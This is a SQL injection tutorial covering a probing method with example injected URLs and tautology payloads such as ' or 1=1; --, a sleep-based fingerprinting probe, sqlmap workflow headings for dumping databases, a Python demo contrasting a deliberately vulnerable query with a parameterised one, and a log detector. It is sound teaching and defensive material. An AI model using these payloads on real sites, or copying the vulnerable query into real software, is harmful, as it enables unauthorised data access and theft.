SQL Injection
Common SQL Statement verbs
- SELECT - retrieves data from a table
- INSERT - adds data to a table
- DELETE - removes data from a table
- UPDATE - modifies data in a table
- DROP - deletes a table
- UNION - combines the results of multiple queries
SQL Query Modifiers
- WHERE
- AND/OR
- LIMIT #1, #2
- ORDER BY #
Special Characters
- ' and " - string delimiters
- --, /*, and # - comment delimiters
- * and % - wildcards
- ; - ends a SQL statement
- = - comparison operator
When attempting a SQL injection, we ideally want to first input data that causes a syntax error, then add characters until the normal result comes back. At that point we know our input is reaching the query intact, and we can add verbs or modifiers knowing they will run.
Sample server side code
Normal input: Defender
URL: http://test.com/sqli.php?name=Defender
SQL Query:
```sql
SELECT *
FROM Users
WHERE lname='Defender';
```
Results: Normal result

Injected input: Defender'
URL: http://test.com/sqli.php?name=Defender'
SQL Query:
```sql
SELECT *
FROM Users
WHERE lname='Defender'';
```
Results: The extra ' leaves the string unterminated and causes a syntax error

Injected input: Defender'; --
URL: http://test.com/sqli.php?name=Defender'; --
SQL Query:
```sql
SELECT *
FROM Users
WHERE lname='Defender'; --';
```
Results: Returns the normal result (the server's own closing quote and semicolon are commented out)

Injected input: Defender' or 1=1; --
URL: http://test.com/sqli.php?name=Defender' or 1=1; --
SQL Query:
```sql
SELECT *
FROM Users
WHERE lname='Defender' or 1=1; --';
```
Results: Returns all rows from the Users table
If commenting with -- does not work, we can alternatively close the string ourselves with a second string comparison so the server's own closing quote still balances. Example injection: Defender' OR 'a'='a
Example statement: SELECT ... WHERE lname='Defender' OR 'a'='a';
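The following is an added example (not code from the original page) that reproduces the sqli.php behaviour above in Python against an in-memory SQLite database, so the three stages (normal result, syntax error, all rows) can be run and compared with a parameterised version of the same lookup. The Users rows are constructed sample data, and `vulnerable_lookup`, `safe_lookup` and `probe` are names chosen here; the alternative payload uses the page's `' OR 'a'='a` form because the SQLite driver refuses a trailing second statement.

```python
import sqlite3

# Constructed sample rows standing in for the page's Users table (not real data).
USERS = [("Defender", "alice"), ("Smith", "bob"), ("Jones", "carol")]


def make_db():
    """Create an in-memory SQLite database holding a small Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (lname TEXT, uname TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", USERS)
    return conn


def vulnerable_lookup(conn, name):
    """Build the query the way the page's sqli.php does: the ?name= value is
    pasted straight into the SQL text, so a quote in the input becomes SQL."""
    query = f"SELECT * FROM Users WHERE lname='{name}';"
    return conn.execute(query).fetchall()


def safe_lookup(conn, name):
    """Parameterised version: the value travels separately from the SQL text,
    so a quote or an OR in the input is only ever compared as data."""
    return conn.execute("SELECT * FROM Users WHERE lname=?;", (name,)).fetchall()


def probe(conn, name):
    """Report what the vulnerable query does with an input: -1 when the
    database raises a syntax error, otherwise the number of rows returned."""
    try:
        return len(vulnerable_lookup(conn, name))
    except sqlite3.Error:
        return -1


if __name__ == "__main__":
    db = make_db()
    for payload in ["Defender", "Defender'", "Defender' OR 'a'='a"]:
        print(f"{payload!r:28} vulnerable -> {probe(db, payload):>2} rows,"
              f" parameterised -> {len(safe_lookup(db, payload))} rows")
```

Running it shows the page's progression: the plain name returns one row, the lone quote returns -1 (unterminated string), and the tautology returns every row. The parameterised lookup returns one row for the real name and zero rows for both injected inputs, because the whole string, quote included, is compared against lname.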
INSERT and UNION statements require the number of columns to match the table or the original query.
INSERT and UNION statements require the data type of each column to match as well.
DB Fingerprinting
Test by sending an input of test' {sleep 10}, then {sleep 20}, and see whether the server takes that long to respond.
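From the defender's side, the probes described in the sample code section and the timing test above leave a recognisable trace in web server logs. The following is an added example (not from the original page) of simple detection logic run over a few constructed access-log lines; the log lines, the rule names and the `scan` function are all assumptions made here, while the parameter values are the page's own payloads. The last line (a legitimate surname containing an apostrophe) is included to show that a bare quote on its own is not enough to raise an alert.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (not from the page); the ?name= values are the
# page's example inputs, percent-encoded as a browser would send them.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli.php?name=Defender HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli.php?name=Defender%27 HTTP/1.1" 500 87',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli.php?name=Defender%27+or+1%3D1%3B+-- HTTP/1.1" 200 9981',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli.php?name=test%27+%7Bsleep+10%7D HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli.php?name=O%27Brien HTTP/1.1" 200 480',
]

# Pull the request target and the response status out of a combined-format line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Each rule is applied to the URL-decoded parameter value, case-insensitively.
RULES = [
    ("quote_then_or", re.compile(r"'\s*or\s+", re.I)),        # Defender' or ...
    ("tautology", re.compile(r"\b(\w+)\s*=\s*\1\b", re.I)),   # 1=1
    ("comment_tail", re.compile(r"'.*?(--|#|/\*)", re.I)),    # quote followed by a comment opener
    ("time_delay", re.compile(r"\b(sleep|waitfor|benchmark|pg_sleep)\b", re.I)),
]


def scan(lines):
    """Return (line index, parameter, decoded value, reasons) for every request
    parameter that matches a rule, or that carries a quote and produced a 5xx."""
    findings = []
    for idx, line in enumerate(lines):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target, status = match.group(1), int(match.group(2))
        for param, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            reasons = [name for name, rx in RULES if rx.search(value)]
            # A lone quote that made the backend fail is the page's first probe step.
            if "'" in value and status >= 500:
                reasons.append("quote_with_server_error")
            if reasons:
                findings.append((idx, param, value, reasons))
    return findings


if __name__ == "__main__":
    for idx, param, value, reasons in scan(LOG_LINES):
        print(f"line {idx}: {param}={value!r} -> {', '.join(reasons)}")
```

Correlating the 5xx status with the quote, rather than alerting on every quote, is what keeps O'Brien quiet while still catching the single-quote probe; the timing rule only sees the keyword, so in practice it would be paired with the response time the log line records if the server logs it.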
Cheat Sheet
Displayed full SQL query as a value
Tools
SQLMAP
Open-source, Python-based command line SQL injection tool created by Bernardo Damele A. G. (@inquisdb)
See sqlmap extended help
Test for vulnerability
Lists Database
With found database, lets list the tables
With found tables, list all columns
Dump all records on a table
Search all columns for a string (Example "pass")
Per found table and columns, dump information of query
Within a pentest you don't want to dump sensitive information, as it gets cached on your machine. Instead of --dump you can use --count to see the number of entries, then --dump --start=1 --stop=3.
Alternatively, dump only the 38th entry.
Grab user and password on database management system (Used to administer DB)
HUGE SQL injection cheat sheet: https://www.websec.ca/kb/sql_injection
NetSPI SQL injection wiki: https://sqlwiki.netspi.com/
Time-based Blind SQL Injection: https://www.sqlinjection.net/time-based/
OWASP Blind SQL injection: https://owasp.org/www-community/attacks/Blind_SQL_Injection
NoSQL injections: https://medium.com/bugbountywriteup/nosql-injection-8732c2140576
swisskyrepo's guide to NoSQL Injections: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection
Understanding GraphQL SQL Schemas and Types: https://graphql.org/learn/schema/
byt3bl33d3r's MS SQL command reference: https://github.com/byt3bl33d3r/CrackMapExec/wiki/MSSQL-Command-Reference